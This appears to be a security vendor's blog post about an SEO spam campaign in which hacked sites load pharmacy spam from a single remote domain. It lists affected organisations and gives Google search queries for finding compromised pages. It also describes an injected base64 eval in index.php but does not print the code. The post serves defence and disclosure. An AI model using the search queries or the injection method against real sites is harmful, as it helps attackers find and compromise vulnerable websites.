We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.
And when this site went down, guess what is showing up on Google:
Yes, that’s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg tadalafil, viagra, etc).
Just some of the affected sites:
www.archaeological.org (Archaeological Institute of America)
www.energycenter.org (Center for sustainable Energy)
www.ieta.org (International Emissions trading association)
www.efpa-italia.org (European Financial planning association)
www.memes.org
www.ancbs.org
www.grains.org
summits.aberdeen.com
www.scbar.org
www.stpsb.org
teamfocususa.org
www.npg.org.uk
www.brooklynwaldorf.org
www.pcs.org
www.nyew.org
www.vrwa.org
www.ior-institute.org
summits.aberdeen.com
www.greenway.org
www.oldlife.org
Finding them on Google is pretty simple as well: inurl:.org ” 5mg tadalafil” or you can also search for: “http://www.google-traffic-analytics.com” “Warning: file_get_contents” which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.
As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.
We will post more details when we have them.
Need help with a hacked site? Check out http://sucuri.net for a complete malware removal and site monitoring solution.
About David Dede